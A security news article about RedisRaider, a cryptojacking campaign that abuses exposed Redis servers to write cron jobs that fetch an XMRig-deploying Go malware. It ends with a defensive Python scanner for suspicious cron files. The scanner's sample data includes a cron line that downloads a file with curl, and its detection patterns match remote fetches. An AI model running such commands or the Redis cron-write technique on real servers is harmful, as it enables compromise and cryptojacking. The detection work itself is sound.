RedisRaider is a new hacking campaign developed in Go that infects Linux servers with the XMRig cryptominer, exploiting vulnerabilities in Redis instances.

20 May 2025 2 minutes Author: Newsman


Researchers from Datadog Security Labs have discovered RedisRaider, a massive IPv4 scanning operation that aims to exploit Redis configuration. The goal is to deploy the XMRig miner and then self-propagate the malware. RedisRaider uses Redis commands (`CONFIG`, `SET`) to add `cron` jobs to `/etc/cron.d`, which download the Go-based malware from a remote server. Infected hosts then launch the Monero miner (XMRig), and the malware spreads to other Redis instances. The campaign uses obfuscation techniques: TTL keys, configuration changes, and log minimization.

RedisRaider is not the first case of cryptojacking via unsecured Redis. Redis, a popular NoSQL database, has repeatedly served as an attack vector, especially when its ports are exposed without authentication. At the same time, Guardz reports an attack on Microsoft Entra ID via BAV2ROPC that allows attackers to bypass MFA, an indicator of systemic abuse of outdated protocols.

RedisRaider demonstrates that even legitimate functions can be used as a weapon. Vulnerable Redis servers become entry points for cryptojacking and further attacks. Exposed Redis instances should be closed off immediately, with access restricted by a firewall, cron monitored, and writes to `/etc/cron.d` disallowed.
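One way to do the cron monitoring recommended above is shown in this added example, which is not code from the article or from Datadog. It assumes the cron file is written as a Redis dump file (RDB), which always begins with the ASCII magic `REDIS` and a four-digit version; the function names and the sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Assumption: a cron file written by Redis is an RDB dump, which starts with "REDIS" + 4 digits.
RDB_MAGIC = re.compile(rb"^REDIS\d{4}")
# A cron entry that pulls something from a remote server with curl or wget.
REMOTE_FETCH = re.compile(rb"\b(curl|wget)\b[^\n]*https?://")

def inspect_cron_file(path):
    """Return the reasons a cron file looks like it was written by Redis."""
    data = Path(path).read_bytes()
    reasons = []
    if RDB_MAGIC.match(data):
        reasons.append("rdb-magic")
    # Legitimate cron files are plain text; a dump carries control bytes.
    if any(b < 9 or 13 < b < 32 for b in data):
        reasons.append("binary-bytes")
    if REMOTE_FETCH.search(data):
        reasons.append("remote-fetch")
    return reasons

def scan_cron_dir(directory):
    """Map file name -> reasons for every suspicious file in a cron directory."""
    findings = {}
    for entry in sorted(Path(directory).iterdir()):
        if entry.is_file():
            reasons = inspect_cron_file(entry)
            if reasons:
                findings[entry.name] = reasons
    return findings

def build_sample_dir():
    """Constructed sample data: one normal cron file, one shaped like a dump."""
    root = Path(tempfile.mkdtemp())
    (root / "logrotate").write_bytes(
        b"# rotate logs\n0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n"
    )
    # Constructed bytes, not a valid dump: magic, opcodes, an embedded cron line.
    (root / "suspect").write_bytes(
        b"REDIS0011\xfa\x09redis-ver\x057.2.4\xfe\x00\x00\x01k\x3d"
        b"\n*/1 * * * * root curl -s http://example.invalid/p -o /tmp/p\n\n\xff"
    )
    return root

if __name__ == "__main__":
    # On a real host, pass "/etc/cron.d" instead of the constructed directory.
    for name, reasons in scan_cron_dir(build_sample_dir()).items():
        print(name, reasons)
```

A file flagged with `rdb-magic` is worth treating as an incident lead rather than a false positive, since no package installs a Redis dump into a cron directory.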
